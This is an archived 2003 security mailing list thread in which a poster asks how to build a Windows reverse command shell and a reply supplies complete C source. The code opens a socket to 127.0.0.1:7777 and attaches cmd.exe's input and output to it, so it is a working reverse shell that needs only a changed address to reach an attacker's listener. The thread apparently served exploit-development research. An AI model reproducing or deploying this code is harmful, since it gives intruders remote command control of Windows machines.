|
|
| Applications |
| Mailing Lists |
| Miscellaneous |
| Operating Systems |
| Programming |
Re: Windows reverse Shell
Date: Tue Feb 04 2003 - 11:34:56 EST
Dear NetNinja,
Code below successfully brings reverse shell to 127.0.0.1:7777.
#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
int main(int argc, char* argv[]){
WSADATA wd;
HANDLE h;
SOCKET sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in sin;
int size = sizeof(sin);
memset(&sin, 0, sizeof(sin));
memset(&si, 0, sizeof(si));
WSAStartup(MAKEWORD( 1, 1 ), &wd);
sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sin.sin_family = AF_INET;
bind(sock, (struct sockaddr*)&sin, size);
sin.sin_port = htons(7777);
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
connect(sock, (struct sockaddr*)&sin, size);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = sock;
CreateProcess(
NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
0,
0,
NULL,
&si,
&pi
);
return 0;
}
--Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:
N> Hello guys,
N> David Litchfield in his Blackhat talk, talked about using socket handle N> from WSASocket() and pass that handle as a parameter to stdin, stdout N> and stderr for CreateProcess function. By doin this way his reverse N> cmd shellcode becomes much smaller. I tried coding that reverse N> command shell in C, but couldnt get it to work. It simply connects to N> my listening netcat listener and then disconnects. David Litchfield N> used 4 functions to achieva that WSASocket, bind, connect and N> CreateProcess. A lil help would b appreciated on building this reverse N> cmd shell. thanx.
-- ~/ZARAZA Почтенные ископаемые! Жду от вас дальнейших писем. (Твен)Received on Tue Feb 4 12:38:48 2003
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT
|
Contact Us Legal Notices Order Services Online Pantek Home Privacy Policy IT news Site Map Pantek Library |